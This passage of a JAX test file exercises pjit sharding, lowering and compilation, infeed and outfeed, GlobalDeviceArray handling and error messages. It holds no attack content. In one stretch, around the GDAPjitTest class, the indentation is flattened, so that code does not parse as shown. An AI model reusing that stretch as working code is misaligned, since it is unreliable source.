    def _test_rule(*args, **kwargs):
      nonlocal test_rule_called
      test_rule_called = True
      in_axis_resources = kwargs['in_axis_resources']
      self.assertEqual(len(in_axis_resources), 1)
      self.assertIn(('y',), in_axis_resources[0].partitions)
      return rule(*args, **kwargs)
    try:
      xla._translations[pjit_p] = _test_rule
      f(x)
      self.assertTrue(test_rule_called)
    finally:
      xla._translations[pjit_p] = rule

  @jtu.with_mesh([('x', 2)])
  def testLowerWithDuckTyping(self):
    x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
    # Make sure this doesn't crash
    pjit(lambda x: x + 4,
         in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)

  @jtu.with_mesh([('x', 2)])
  def testLowerDonateArgnumsAvailable(self):
    x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
    def f(*args):
      x, *_ = args
      return x
    f_low = pjit(f, donate_argnums=(0,),
                 in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
    f_com = f_low.compile()
    # NOTE(review): missing self.assertEqual -- this comparison is a no-op
    # expression, so the donate_argnums values are never actually checked.
    f_low.donate_argnums == f_com.donate_argnums == (0,)

  def testInfeed(self):
    devices = np.array(jax.local_devices())
    nr_devices = len(devices)
    shape = (nr_devices * 3, nr_devices * 5)

    def f_for_jit(x):
      token = lax.create_token(x)
      (y,), token = lax.infeed(
          token, shape=(jax.ShapedArray(x.shape, np.float32),))
      (z,), token = lax.infeed(
          token, shape=(jax.ShapedArray(x.shape, np.float32),))
      (w,), token = lax.infeed(
          token, shape=(jax.ShapedArray(x.shape, np.float32),))
      return x + y + z + w

    x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
    y = x * 2.
    z = x * 3.
    w = x * 4.

    # Transfer data to infeed before executing the function. For GPUs, the
    # execution of the compiled function is blocking, so transferring data
    # to infeed before executing ensures that the execution does not deadlock
    # waiting for the infeed data.
    logging.info('Transfering to infeed for the jit call')
    d = devices[0]
    d.transfer_to_infeed((y,))
    d.transfer_to_infeed((z,))
    d.transfer_to_infeed((w,))

    # JIT
    logging.info('Making jit call')
    res0 = jax.jit(f_for_jit)(x)
    self.assertAllClose(res0, x + y + z + w, check_dtypes=True)

    # PJIT
    def f_for_pjit(x):
      token = lax.create_token(x)
      # A replicated infeed
      (y,), token = lax.infeed(
          token,
          shape=(jax.ShapedArray(x.shape, np.float32),),
          partitions=(None,))
      # An infeed sharded on first axis
      (z,), token = lax.infeed(
          token,
          shape=(jax.ShapedArray(x.shape, np.float32),),
          partitions=(P(nr_devices, 1),))
      # An infeed sharded on second axis
      (w,), token = lax.infeed(
          token,
          shape=(jax.ShapedArray(x.shape, np.float32),),
          partitions=(P(1, nr_devices),))
      return x + y + z + w

    logging.info('Transfering to infeed for the pjit call')
    for didx, d in enumerate(devices):
      # Transfer the whole array to all devices for replicated.
      d.transfer_to_infeed((y,))
      # For sharded infeed, transfer only the needed slices to each device.
      # NOTE(review): unlike the line below, this argument has no trailing
      # comma, so it is a bare array rather than a 1-tuple -- confirm both
      # forms are accepted by transfer_to_infeed.
      d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
      d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))

    with mesh(devices, ['d']):
      logging.info('Making pjit call')
      res = pjit(
          f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
              x)

    self.assertAllClose(res0, res, check_dtypes=True)

  def testOutfeed(self):
    devices = np.array(jax.local_devices())
    nr_devices = len(devices)
    shape = (nr_devices * 3, nr_devices * 5)

    def f(x):
      token = lax.create_token(x)
      token = lax.outfeed(token, x, partitions=(None,))
      token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
      token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
      return x

    x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)

    def dispatch():
      with mesh(devices, ['d']):
        logging.info('Making pjit call')
        pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
    # Dispatch on a separate thread so the main thread can concurrently
    # drain the outfeed (the computation blocks until outfeed is consumed).
    execution = threading.Thread(target=dispatch)
    execution.start()

    def check_outfeed(d, x):
      y, = d.transfer_from_outfeed(
          xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
      self.assertAllClose(x, y, check_dtypes=True)

    logging.info('Transfering from outfeed for the pjit call')
    for didx, d in enumerate(devices):
      # Transfer the whole array from all devices for replicated.
      check_outfeed(d, x)
      # For sharded outfeed, the results are sliced.
      check_outfeed(d, x[3 * didx:3 * didx + 3, :])
      check_outfeed(d, x[:, 5 * didx:5 * didx + 5])

    execution.join()

  @jtu.with_mesh([('x', 2)])
  def testWithCustomPRNGKey(self):
    if not config.jax_enable_custom_prng:
      raise unittest.SkipTest("test requires jax_enable_custom_prng")
    key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
    # Make sure this doesn't crash
    pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompile(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y
    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    expected = x @ (x + 1)
    # AOT path: lower then compile, then execute the compiled object.
    exe = f.lower(x, x + 1).compile()
    actual = exe(x, x + 1)

    splits = np.split(expected, 4)
    self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileWithKwargs(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y, **kwargs):
      return x @ y
    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    exe = f.lower(x, x + 1).compile()

    self.assertRaisesRegex(
        NotImplementedError,
        "function was compiled by a transformation that does not support "
        "keyword arguments, but called with keyword arguments: a, b",
        lambda: exe(x, x + 1, a=1, b=2))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileInTreeMismatch(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y
    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    exe = f.lower(x, x + 1).compile()

    self.assertRaisesRegex(
        TypeError, "function compiled for .*, called with .*",
        lambda: exe([x], [x + 1]))

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testLowerCompileArgTypeMismatch(self):
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y
    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    x_f32 = x.astype(jnp.float32)
    x_i32 = x.astype(jnp.int32)
    exe = f.lower(x_f32, x_f32).compile()
    self.assertRaisesRegex(
        TypeError,
        "Computation compiled for input types:\n.*float32.*\n"
        "called with:\n.*int32.*",
        lambda: exe(x_i32, x_i32))
class GDAPjitTest(jtu.JaxTestCase):
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_single_output(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x @ x.T
expected_matrix_mul = input_data @ input_data.T
out = f(gda_obj)
self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
self.assertEqual(out.shape, (8, 8))
self.assertEqual(out.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
for s in out.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
out2 = f(out)
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
with self.assertRaisesRegex(
ValueError, ('For a non-GDA input, the corresponding resource in '
'in_axis_resources cannot be `pjit.FROM_GDA`.')):
f(input_data)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_multi_input_multi_output(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
mesh_axes1 = P('x', 'y')
gda1 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes1, cb)
mesh_axes2 = P('x')
gda2 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes2, cb)
mesh_axes3 = P(('x', 'y'))
gda3 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes3, cb)
mesh_axes4 = P(None)
gda4 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes4, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(
pjit,
# `FROM_GDA` will be replicated for all the inputs.
in_axis_resources=FROM_GDA,
out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
def f(x, y, z, a):
return x @ x.T, y, z, a
out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
self.assertListEqual([s.replica_id for s in out1.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
expected_matrix_mul = input_data @ input_data.T
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 2))
self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
self.assertListEqual([s.replica_id for s in out2.local_shards],
[0, 1, 2, 3, 4, 5, 6, 7])
for s in out2.local_shards:
self.assertArraysEqual(s.data, input_data)
self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
self.assertEqual(out3.shape, (8, 2))
self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out3.local_shards],
[0, 1, 0, 1, 0, 1, 0, 1])
for s in out3.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
self.assertEqual(out4.shape, (8, 2))
self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out4.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
for s in out4.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_mixed_inputs(self):
  """pjit accepts a mix of GDA and plain ndarray arguments in one call."""
  device_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
  global_shape = (8, 2)
  sharding_axes = P('x', 'y')
  host_data = np.arange(prod(global_shape)).reshape(global_shape)
  gda_input = global_device_array.GlobalDeviceArray.from_callback(
      global_shape, device_mesh, sharding_axes, lambda index: host_data[index])

  with jax._src.config.parallel_functions_output_gda(True):
    @partial(pjit,
             in_axis_resources=(FROM_GDA, P('x', 'y')),
             out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
    def f(x, y):
      return x @ x.T, y @ y.T

    expected = host_data @ host_data.T
    out1, out2 = f(gda_input, host_data)
    # Both outputs are GDAs holding the same (8, 8) product; they differ
    # only in how that result is sharded across the 4x2 mesh.
    for out, shard_shape in ((out1, (2, 4)), (out2, (1, 8))):
      self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
      self.assertEqual(out.shape, (8, 8))
      self.assertEqual(out.local_shards[0].data.shape, shard_shape)
      self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
      for shard in out.local_shards:
        self.assertArraysEqual(shard.data, expected[shard.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_non_gda_inputs(self):
  """GDA-typed outputs are produced even when no input is a GDA."""
  shape = (8, 2)
  host_data = np.arange(prod(shape)).reshape(shape)

  with jax._src.config.parallel_functions_output_gda(True):
    @partial(pjit,
             in_axis_resources=(None, P('x', 'y')),
             out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
    def f(x, y):
      return x @ x.T, y @ y.T

    expected = host_data @ host_data.T
    out1, out2 = f(host_data, host_data)
    # Same (8, 8) result twice, under two different output shardings.
    for out, shard_shape in ((out1, (2, 4)), (out2, (1, 8))):
      self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
      self.assertEqual(out.shape, (8, 8))
      self.assertEqual(out.local_shards[0].data.shape, shard_shape)
      self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
      for shard in out.local_shards:
        self.assertArraysEqual(shard.data, expected[shard.index])
@jtu.with_mesh([('x', 2), ('y', 2)])
def test_pjit_gda_mesh_mismatch(self):
  """Passing a GDA built on a different mesh than pjit's raises ValueError."""
  gda_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))  # not pjit's 2x2 mesh
  shape = (8, 2)
  host_data = np.arange(prod(shape), dtype=np.float32).reshape(shape)
  gda_input = global_device_array.GlobalDeviceArray.from_callback(
      shape, gda_mesh, ['x', 'y'], lambda index: host_data[index])

  with self.assertRaisesRegex(ValueError,
                              "Pjit's mesh and GDA's mesh should be equal."):
    @partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
    def f(x):
      return x

    f(gda_input)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_wrong_resource_for_gda_input(self):
  """A GDA partitioned differently from in_axis_resources must be rejected.

  The GDA below is sharded only along 'x', while pjit is told to expect
  P('x', 'y'); pjit must raise with exactly the message asserted here.
  """
  global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
  global_input_shape = (8, 2)
  mesh_axes = ['x']  # GDA spec: only dimension 0 is sharded
  global_input_data = np.arange(
      prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)

  def cb(index):
    # Callback handing each device its shard of the global array.
    return global_input_data[index]

  gda_obj = global_device_array.GlobalDeviceArray.from_callback(
      global_input_shape, global_mesh, mesh_axes, cb)
  # Literal (not regex) match: the exact error text is part of the contract
  # being tested, including the FROM_GDA hint.
  with self.assertRaisesWithLiteralMatch(
      ValueError,
      "Got an input GDA to pjit with different partitioning than specified "
      'in the in_axis_resources argument to pjit. The partitioning must '
      'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
      "Got GDA spec: PartitionSpec('x',) and "
      "pjit spec: PartitionSpec('x', 'y') "
      'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
    @partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
    def f(x):
      return x
    f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_caching(self):
  """Retracing happens only when the argument kinds change between calls."""
  device_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
  shape = (8, 2)
  sharding_axes = P('x', 'y')
  host_data = np.arange(prod(shape), dtype=np.float32).reshape(shape)
  gda_obj = global_device_array.GlobalDeviceArray.from_callback(
      shape, device_mesh, sharding_axes, lambda index: host_data[index])

  trace_counter = [0]

  @partial(pjit, in_axis_resources=sharding_axes, out_axis_resources=P('x', 'y'))
  def f(x, y):
    trace_counter[0] += 1
    return x @ y.T

  # A repeated (gda, gda) call hits the trace cache; each previously
  # unseen combination of argument kinds forces one new trace.
  call_plan = (
      (gda_obj, gda_obj, 1),
      (gda_obj, gda_obj, 1),
      (host_data, host_data, 2),
      (gda_obj, host_data, 3),
  )
  for x, y, expected_traces in call_plan:
    f(x, y)
    self.assertListEqual(trace_counter, [expected_traces])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_partition_spec_mismatch_semantically_equivalent(self):
  """P(None) and the empty spec () must be treated as the same sharding."""
  global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
  global_input_shape = (8, 2)
  mesh_axes = [None]  # fully replicated input
  global_input_data = np.arange(
      prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)

  def cb(index):
    # Callback handing each device its (replicated) copy of the data.
    return global_input_data[index]

  with jax._src.config.parallel_functions_output_gda(True):
    gda_obj = global_device_array.GlobalDeviceArray.from_callback(
        global_input_shape, global_mesh, mesh_axes, cb)

    @partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
    def f(x):
      return x

    output_gda = f(gda_obj)
    # Ensure output_gda._mesh_axes = P() is matched with P(None).
    self.assertEqual(output_gda._mesh_axes, ())
    # P(None) is in_axis_resources; feeding the output back in must work.
    f(output_gda)
def test_from_gda_duplicates(self):
  """A second FROM_GDA singleton instance must be accepted by pjit."""
  global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
  input_gda = create_gda((8, 2), global_mesh, ['x', 'y'])
  # Two FROM_GDA "singletons" can coexist in practice (e.g. after pickling
  # in_axis_resources and sending it to another process), so a fresh
  # instance must not trigger an error and confuse users.
  duplicate_from_gda = pjit_lib._FromGdaSingleton()
  with mesh(global_mesh.devices, global_mesh.axis_names):
    pjit(lambda x: x,
         in_axis_resources=duplicate_from_gda,
         out_axis_resources=None)(input_gda)
def test_no_recompilation_due_to_in_axis_resources(self):
  """Feeding pjit's own GDA output back in must not miss the lowering cache."""
  global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
  global_input_shape = (8, 2)
  mesh_axes = P(None,)  # fully replicated
  input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)

  with jax._src.config.parallel_functions_output_gda(True):
    @partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=mesh_axes)
    def f(x):
      return x

    with mesh(global_mesh.devices, global_mesh.axis_names):
      out_gda = f(input_gda)
      # Output normalizes P(None) down to the empty spec ().
      self.assertEqual(out_gda._mesh_axes, ())

      before_cache = pjit_lib._pjit_lower.cache_info()
      f(out_gda)
      after_cache = pjit_lib._pjit_lower.cache_info()

      # The second call must be a pure cache hit: one more hit, no new miss.
      self.assertNotEqual(id(before_cache), id(after_cache))
      self.assertEqual(before_cache.hits + 1, after_cache.hits)
      self.assertEqual(before_cache.misses, after_cache.misses)
def spec_regex(s):
  """Return str(s) with '(' and ')' backslash-escaped for use in a regex."""
  return str(s).translate(str.maketrans({'(': r'\(', ')': r'\)'}))
class PJitErrorTest(jtu.JaxTestCase):
  """Error-reporting tests for pjit.

  Every misuse (non-divisible shapes, undefined mesh axes, too-low rank,
  duplicate resources, xmap-axis collisions, empty mesh, pytree-prefix
  mismatches, nested mesh changes) must fail with a precise, user-actionable
  message; the tests pin those messages via regexes built with spec_regex.
  """

  @check_1d_2d_mesh(set_mesh=True)
  def testNonDivisibleArgs(self, mesh, resources):
    # Dimension 0 of size 3 cannot be split across the product of mesh sizes.
    x = jnp.ones((3, 2))
    spec = P(resources, None)
    mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
    with self.assertRaisesRegex(ValueError,
                                r"One of pjit arguments.*" + spec_regex(spec) + r".*"
                                r"implies that the size of its dimension 0 should be "
                                r"divisible by " + mesh_size + r", but it is equal to 3"):
      pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)

  @check_1d_2d_mesh(set_mesh=True)
  def testNonDivisibleOuts(self, mesh, resources):
    # Same divisibility check, but reported for an output spec.
    x = jnp.ones((3, 2))
    spec = P(resources, None)
    mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
    with self.assertRaisesRegex(ValueError,
                                r"One of pjit outputs.*" + spec_regex(spec) + r".*"
                                r"implies that the size of its dimension 0 should be "
                                r"divisible by " + mesh_size + r", but it is equal to 3"):
      pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)

  @check_1d_2d_mesh(set_mesh=True)
  def testNonDivisibleConstraint(self, mesh, resources):
    # Same divisibility check, reported for with_sharding_constraint.
    x = jnp.ones((3, 2))
    spec = P(resources,)
    mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
    with self.assertRaisesRegex(ValueError,
                                r"One of with_sharding_constraint arguments"
                                r".*" + spec_regex(spec) + r".*implies that the size of "
                                r"its dimension 0 should be divisible by " + mesh_size +
                                r", but it is equal to 3"):
      pjit(lambda x: with_sharding_constraint(x, spec),
           in_axis_resources=None, out_axis_resources=None)(x)

  @check_1d_2d_mesh(set_mesh=False)
  @jtu.with_mesh([('z', 1)])
  def testUndefinedResourcesArgs(self, mesh, resources):
    # The active mesh only defines 'z', so a spec mentioning 'x' must fail.
    x = jnp.ones((2, 2))
    spec = P(resources,)
    with self.assertRaisesRegex(ValueError,
                                r"One of pjit arguments.*" + spec_regex(spec) + r", "
                                r"but resource axis x is undefined."):
      pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)

  @check_1d_2d_mesh(set_mesh=False)
  @jtu.with_mesh([('z', 1)])
  def testUndefinedResourcesOuts(self, mesh, resources):
    x = jnp.ones((2, 2))
    spec = P(resources,)
    with self.assertRaisesRegex(ValueError,
                                r"One of pjit outputs.*" + spec_regex(spec) + r", "
                                r"but resource axis x is undefined."):
      pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)

  @check_1d_2d_mesh(set_mesh=False)
  @jtu.with_mesh([('z', 1)])
  def testUndefinedResourcesConstraint(self, mesh, resources):
    x = jnp.ones((2, 2))
    spec = P(resources,)
    with self.assertRaisesRegex(ValueError,
                                r"One of with_sharding_constraint arguments"
                                r".*" + spec_regex(spec) + r", but resource axis "
                                r"x is undefined."):
      pjit(lambda x: with_sharding_constraint(x, spec),
           in_axis_resources=None, out_axis_resources=None)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testRankTooLowArgs(self):
    # A 2-axis spec implies rank >= 2; a rank-1 argument must be rejected.
    x = jnp.arange(2)
    spec = P('x', 'y')
    error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
             r"that it has a rank of at least 2, but it is 1")
    with self.assertRaisesRegex(ValueError, error):
      pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testRankTooLowArgsAxisResourcesNone(self):
    # Even P(None, None) constrains the rank (two positional entries).
    x = jnp.arange(2)
    spec = P(None, None)
    error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
             r"that it has a rank of at least 2, but it is 1")
    with self.assertRaisesRegex(ValueError, error):
      pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testRankTooLowOuts(self):
    # sum() produces a scalar (rank 0), which cannot carry a 2-axis spec.
    x = jnp.arange(2)
    spec = P('x', 'y')
    error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
             r"that it has a rank of at least 2, but it is 0")
    with self.assertRaisesRegex(ValueError, error):
      pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testRankTooLowConstraint(self):
    x = jnp.arange(2)
    spec = P('x', 'y')
    error = (r"One of with_sharding_constraint arguments " +
             r"was given.*" + spec_regex(spec) + r", which implies "
             r"that it has a rank of at least 2, but it is 1")
    with self.assertRaisesRegex(ValueError, error):
      pjit(lambda x: with_sharding_constraint(x, spec),
           in_axis_resources=None, out_axis_resources=None)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testRepeatedInResources(self):
    x = jnp.arange(2)
    # 'x' appears twice, directly and inside a tuple entry — both illegal.
    for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
      error = (r"A single in_axis_resources specification can map every mesh "
               r"axis to at most one positional dimension, but " +
               spec_regex(spec) + " has duplicate entries for `x`")
      with self.assertRaisesRegex(ValueError, error):
        pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testRepeatedOutResources(self):
    x = jnp.arange(2)
    for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
      error = (r"A single out_axis_resources specification can map every mesh "
               r"axis to at most one positional dimension, but " +
               spec_regex(spec) + " has duplicate entries for `x`")
      with self.assertRaisesRegex(ValueError, error):
        pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)

  @jtu.with_mesh([('x', 2)])
  def testInputShardsXMapAxis(self):
    # xmap already uses mesh axis 'x' for the named axis 'i'; an inner pjit
    # may not reuse it for a positional dimension.
    spec = P('x')
    f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
             in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
    x = jnp.arange(4).reshape((2, 2))
    error = (r"pjit input has an axis resources specification of " +
             spec_regex(spec) + r" that uses one or more mesh axes already used by "
             r"xmap to partition a named axis appearing in its named_shape \(both "
             r"use mesh axes `x`\)")
    with self.assertRaisesRegex(JAXTypeError, error):
      f(x)

  @jtu.with_mesh([('x', 2)])
  def testOutputShardsXMapAxis(self):
    spec = P('x')
    f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
             in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
    x = jnp.arange(4).reshape((2, 2))
    error = (r"pjit output has an axis resources specification of " +
             spec_regex(spec) + r" that uses one or more mesh axes already used by "
             r"xmap to partition a named axis appearing in its named_shape \(both "
             r"use mesh axes `x`\)")
    with self.assertRaisesRegex(JAXTypeError, error):
      f(x)

  @jtu.with_mesh([('x', 2)])
  def testConstraintShardsXMapAxis(self):
    spec = P('x')
    f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
             in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
    x = jnp.arange(4).reshape((2, 2))
    error = (r"with_sharding_constraint input has an axis resources specification of " +
             spec_regex(spec) + r" that uses one or more mesh axes already used by "
             r"xmap to partition a named axis appearing in its named_shape \(both "
             r"use mesh axes `x`\)")
    with self.assertRaisesRegex(JAXTypeError, error):
      f(x)

  @jtu.with_mesh([('x', 2)])
  def testCatchesInnerXMapErrors(self):
    # Both named axes map to the same mesh axis inside the xmap — the error
    # must surface through the wrapping pjit.
    f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
                  axis_resources={'i': 'x', 'j': 'x'}),
             in_axis_resources=None, out_axis_resources=None)
    x = jnp.arange(4)
    with self.assertRaises(JAXTypeError):
      f(x, x)

  def testEmptyMesh(self):
    # No mesh context manager is active here, so pjit must refuse to run.
    error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
             r"at the call site?")
    with self.assertRaisesRegex(RuntimeError, error):
      pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))

  @jtu.with_mesh([('x', 2)])
  def testAxisResourcesMismatch(self):
    # Spec pytrees must be a prefix of the argument pytree; the error should
    # hint that in_axis_resources needs wrapping in an argument tuple.
    x = jnp.ones([])
    p = [None, None, None]
    pjit(lambda x: x, (p,), p)([x, x, x])  # OK
    error = re.escape(
        r"pjit in_axis_resources specification must be a tree prefix of the "
        r"corresponding value, got specification (None, None, None) for value "
        r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
        r"non-trivial pytrees should always be wrapped in a tuple representing "
        r"the argument list.")
    with self.assertRaisesRegex(ValueError, error):
      pjit(lambda x, y: x, p, p)(x, x)  # Error, but make sure we hint at tupling
    # TODO(apaszke): Disable implicit list casts and enable this
    # error = re.escape(
    # r"pjit in_axis_resources specification must be a tree prefix of the "
    # r"corresponding value, got specification (None, None, None) for value "
    # r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
    # r"are non-trivial pytrees should always be wrapped in a tuple representing "
    # r"the argument list. In particular, you're passing in a single argument "
    # r"which means that pjit in_axis_resources might need to be wrapped in a "
    # r"singleton tuple.")
    # with self.assertRaisesRegex(ValueError, error):
    # pjit(lambda x: x, p, p)([x, x, x])  # Error, but make sure we hint at singleton tuple
    error = re.escape(
        r"pjit out_axis_resources specification must be a tree prefix of the "
        r"corresponding value, got specification [[None, None, None], None] for "
        r"value tree PyTreeDef([*, *, *]).")
    with self.assertRaisesRegex(ValueError, error):
      pjit(lambda x: x, (p,), [p, None])([x, x, x])  # Error, we raise a generic tree mismatch message

  @jtu.with_mesh([('x', 2)])
  def testNestedDifferentResources(self):
    # An inner pjit may not switch to a different physical mesh.
    @partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
    def f(x):
      with mesh(np.array([jax.local_devices()[0]]), ('x')):
        @partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
        def h(x):
          return x
